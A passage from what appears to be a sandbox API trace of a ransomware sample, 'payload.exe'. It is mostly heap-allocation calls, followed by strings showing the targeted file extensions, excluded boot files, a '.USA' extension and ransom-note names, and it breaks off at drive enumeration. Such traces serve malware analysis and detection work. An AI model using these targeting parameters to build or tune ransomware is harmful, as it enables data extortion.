(HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609c60 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609c78 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609c90 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609ca8 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609cc0 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609cd8 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609cf0 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609d08 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609d20 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609d38 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609d50 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609d68 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609d80 [0031.355] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609d98 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6052f0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609db0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609dc8 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609de0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x609fd0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609df8 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609e10 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609e28 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609e40 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609e58 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609e70 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609e88 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609ea0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609eb8 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609ed0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609ee8 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609f00 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609f18 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x609f30 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609f48 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609f60 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609f78 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x609f90 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c470 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c488 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c4a0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x609fe0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x609ff0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c4b8 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c4d0 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c4e8 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c500 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c518 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61c530 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c548 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c560 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c578 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c590 [0031.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61c5a8 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c5c0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c5d8 [0031.357] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6091a0, Size=0x400) returned 0x6091a0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c5f0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c608 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61c620 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c638 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c650 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c668 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61c680 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c698 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c6b0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c6c8 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x60a000 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c6e0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61c6f8 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c710 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c728 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c740 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c758 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x61c770 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c788 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c7a0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c7b8 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c7d0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c7e8 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c800 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c818 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c830 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x60a010 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c870 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c888 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c8a0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c8b8 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c8d0 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c8e8 [0031.357] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c900 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c918 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c930 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x61c948 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c960 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x61c978 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c990 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c9a8 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c9c0 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c9d8 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61c9f0 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61ca08 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ca20 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ca38 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ca50 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ca68 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ca80 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ca98 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cab0 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cac8 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cae0 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61caf8 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cb10 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cb28 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cb40 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cb58 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cb70 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cb88 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cba0 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x61cbb8 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12) returned 0x605f08 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cbd0 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cbe8 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cc00 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cc18 [0031.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cc30 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cc70 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cc88 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cca0 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ccb8 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ccd0 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cce8 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cd00 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cd18 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cd30 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cd48 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cd60 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cd78 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cd90 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cda8 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cdc0 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61cdd8 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61cdf0 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61ce08 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x61ce20 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61ce38 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x60a020 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ce50 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x60a030 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ce68 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ce80 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61ce98 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61ceb0 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61cec8 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cee0 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61cef8 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cf10 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cf28 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61cf40 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cf58 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61cf70 [0031.359] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61cf88 [0031.360] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cfa0 [0031.360] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x60a040 [0031.360] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cfb8 [0031.360] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x61cfd0 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6091a0, Size=0x800) returned 0x61d458 [0031.360] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0031.360] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61b450 | out: hHeap=0x5d0000) returned 1 [0031.360] lstrlenW (lpString="") returned 0 [0031.360] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61dd98 | out: hHeap=0x5d0000) returned 1 [0031.360] lstrlenW (lpString=".USA") returned 4 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4758, Size=0x8) returned 0x5e4758 [0031.360] lstrlenW (lpString=".USA") returned 4 [0031.360] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61dd98 | out: hHeap=0x5d0000) returned 1 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61ddc8, Size=0x20) returned 0x5e4378 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4378, Size=0x40) returned 0x606a88 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606a88, Size=0x80) returned 0x62b458 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a0b0, Size=0x8) returned 0x60a0c0 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a0c0, Size=0x10) returned 0x61ddc8 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61ddc8, Size=0x20) returned 0x5e4350 [0031.360] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0031.360] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62b458 | out: hHeap=0x5d0000) returned 1 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61ddf8, Size=0x20) returned 0x605938 [0031.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605938, Size=0x40) returned 0x606a88 [0031.360] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0031.361] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19 [0031.361] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x606a88 | out: hHeap=0x5d0000) returned 1 [0031.361] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61ddf8, Size=0x20) returned 0x605938 [0031.361] lstrlenW (lpString="Info.hta") returned 8 [0031.361] lstrlenW (lpString="Info.hta") returned 8 [0031.361] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605938 | out: hHeap=0x5d0000) returned 1 [0031.361] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x63d448, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\payload.exe")) returned 0x31 [0031.361] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63d448 | out: hHeap=0x5d0000) returned 1 [0031.361] lstrlenW (lpString="payload.exe") returned 11 [0031.361] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4350, Size=0x40) returned 0x606a88 [0031.361] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61ddf8, Size=0x20) returned 0x5e4350 [0031.361] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61ddf8, Size=0x20) returned 0x605938 [0031.361] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605938, Size=0x40) returned 0x606ad0 [0031.361] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606ad0, Size=0x80) returned 0x62b458 [0031.361] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62b458, Size=0x100) returned 0x61b450 [0031.361] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.361] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61b450 | out: hHeap=0x5d0000) returned 1 [0031.361] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x63d448, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0031.362] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x64d450 | out: hHeap=0x5d0000) returned 1 [0031.362] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63d448 | out: hHeap=0x5d0000) returned 1 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a0c0, Size=0x8) returned 0x60a0b0 [0031.362] lstrlenW (lpString="%windir%;") returned 9 [0031.362] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4350 | out: hHeap=0x5d0000) returned 1 [0031.362] lstrlenW (lpString="C:\\Windows;") returned 11 [0031.362] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62d440 | out: hHeap=0x5d0000) returned 1 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61de10, Size=0x20) returned 0x5e4350 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4350, Size=0x40) returned 0x606ad0 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606ad0, Size=0x80) returned 0x62b458 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62b458, Size=0x100) returned 0x61b450 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a0f0, Size=0x8) returned 0x60a100 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a100, Size=0x10) returned 0x61de58 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61de58, Size=0x20) returned 0x5e4350 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a0c0, Size=0x8) returned 0x60a100 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a0d0, Size=0x8) returned 0x60a0c0 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a0f0, Size=0x8) returned 0x60a110 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a110, Size=0x10) returned 0x61df00 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61df00, Size=0x20) returned 0x605938 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a100, Size=0x10) returned 0x61df00 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a0c0, Size=0x10) returned 0x61df30 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a100, Size=0x8) returned 0x60a0f0 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a120, Size=0x8) returned 0x60a130 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61df00, Size=0x20) returned 0x6058e8 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61df30, Size=0x20) returned 0x605848 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a140, Size=0x8) returned 0x60a150 [0031.362] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0031.362] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61b450 | out: hHeap=0x5d0000) returned 1 [0031.362] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61dfa8, Size=0x20) returned 0x605960 [0031.363] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x62d440, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0031.363] lstrlenW (lpString="C:\\") returned 3 [0031.363] GetVolumeInformationW (in: lpRootPathName="C:\\", 